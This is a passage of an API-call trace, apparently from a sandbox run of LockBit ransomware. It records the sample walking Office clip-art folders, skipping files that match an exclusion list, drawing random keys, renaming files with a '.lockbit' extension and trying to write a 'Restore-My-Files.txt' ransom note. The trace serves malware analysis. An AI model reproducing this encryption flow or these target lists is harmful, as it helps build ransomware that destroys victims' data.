dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.333] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.333] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.333] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2378) returned 1 [0109.333] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.334] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.334] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.334] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.334] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.336] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.336] malloc (_Size=0xa6) returned 0x77d800 [0109.336] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.337] free (_Block=0x77d800) [0109.337] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.337] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.337] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.338] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c6eb500, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5c6eb500, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x414, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS00135_.WMF", cAlternateFileName="")) returned 1 [0109.338] lstrcmpiW (lpString1=".", lpString2="BS00135_.WMF") returned -1 [0109.338] lstrcmpiW (lpString1="..", lpString2="BS00135_.WMF") returned -1 [0109.338] PathFindExtensionW (pszPath="BS00135_.WMF") returned=".WMF" [0109.338] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.338] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.338] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.338] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.338] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.338] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.338] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.338] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.338] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.338] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.338] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.338] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.338] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.338] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.338] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.338] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.338] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.338] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.338] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.338] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.338] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.338] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.339] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.339] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.340] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.340] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS00135_.WMF") returned 1 [0109.340] lstrcmpiW (lpString1="ntldr", lpString2="BS00135_.WMF") returned 1 [0109.340] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS00135_.WMF") returned 1 [0109.340] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS00135_.WMF") returned -1 [0109.340] lstrcmpiW (lpString1="autorun.inf", lpString2="BS00135_.WMF") returned -1 [0109.340] lstrcmpiW (lpString1="thumbs.db", lpString2="BS00135_.WMF") returned 1 [0109.340] lstrcmpiW (lpString1="iconcache.db", lpString2="BS00135_.WMF") returned 1 [0109.340] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.340] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned=".WMF" [0109.340] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.340] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.340] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.340] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.340] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.340] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.340] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.340] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.340] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.340] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.340] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.340] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.340] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.340] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.340] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.340] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.340] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.340] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.341] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.341] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.341] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.341] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.341] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.341] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.341] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.341] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.341] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.341] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.341] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF.lockbit") returned 72 [0109.341] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0109.341] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.341] malloc (_Size=0x40068) returned 0x3e70008 [0109.341] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=1044) returned 1 [0109.342] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.342] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0109.342] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.342] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0109.342] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0109.346] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.346] malloc (_Size=0xa6) returned 0x77d800 [0109.346] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.346] free (_Block=0x77d800) [0109.346] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.346] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.346] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.347] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5295200, ftCreationTime.dwHighDateTime=0x1bd4b23, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc5295200, ftLastWriteTime.dwHighDateTime=0x1bd4b23, nFileSizeHigh=0x0, nFileSizeLow=0x876, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS00136_.WMF", cAlternateFileName="")) returned 1 [0109.347] lstrcmpiW (lpString1=".", lpString2="BS00136_.WMF") returned -1 [0109.347] lstrcmpiW (lpString1="..", lpString2="BS00136_.WMF") returned -1 [0109.347] PathFindExtensionW (pszPath="BS00136_.WMF") returned=".WMF" [0109.347] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.347] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.347] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.347] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.347] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.347] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.347] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.347] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.347] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.347] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.347] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.347] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.347] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.347] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.347] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.347] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.347] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.347] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.347] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.348] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.348] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.349] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.349] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.349] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS00136_.WMF") returned 1 [0109.349] lstrcmpiW (lpString1="ntldr", lpString2="BS00136_.WMF") returned 1 [0109.349] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS00136_.WMF") returned 1 [0109.349] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS00136_.WMF") returned -1 [0109.349] lstrcmpiW (lpString1="autorun.inf", lpString2="BS00136_.WMF") returned -1 [0109.349] lstrcmpiW (lpString1="thumbs.db", lpString2="BS00136_.WMF") returned 1 [0109.349] lstrcmpiW (lpString1="iconcache.db", lpString2="BS00136_.WMF") returned 1 [0109.349] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.349] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned=".WMF" [0109.349] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.349] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.349] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.349] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.349] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.349] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.349] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.349] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.349] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.349] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.349] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.349] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.349] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.349] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.349] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.350] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.350] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.350] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.350] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.350] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.350] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.350] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.350] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.350] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.350] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.350] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.350] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.350] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.350] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF.lockbit") returned 72 [0109.350] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0109.351] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.351] malloc (_Size=0x40068) returned 0x3ef0008 [0109.351] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=2166) returned 1 [0109.351] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.352] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0109.352] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.353] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0109.353] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0109.359] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.359] malloc (_Size=0xa6) returned 0x77d800 [0109.359] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.360] free (_Block=0x77d800) [0109.360] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.361] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.361] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.361] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd99a2a00, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd99a2a00, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x6b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS00145_.WMF", cAlternateFileName="")) returned 1 [0109.361] lstrcmpiW (lpString1=".", lpString2="BS00145_.WMF") returned -1 [0109.361] lstrcmpiW (lpString1="..", lpString2="BS00145_.WMF") returned -1 [0109.361] PathFindExtensionW (pszPath="BS00145_.WMF") returned=".WMF" [0109.361] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.361] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.361] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.361] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.361] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.361] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.361] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.361] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.361] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.361] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.361] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.361] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.362] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.362] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.362] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.362] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.362] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.362] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.362] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.362] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.362] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.362] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.362] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.362] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.362] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.362] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.362] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.362] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.362] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.362] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.362] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.363] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.363] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.363] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.363] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.363] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.363] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.363] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.363] lstrcmpiW 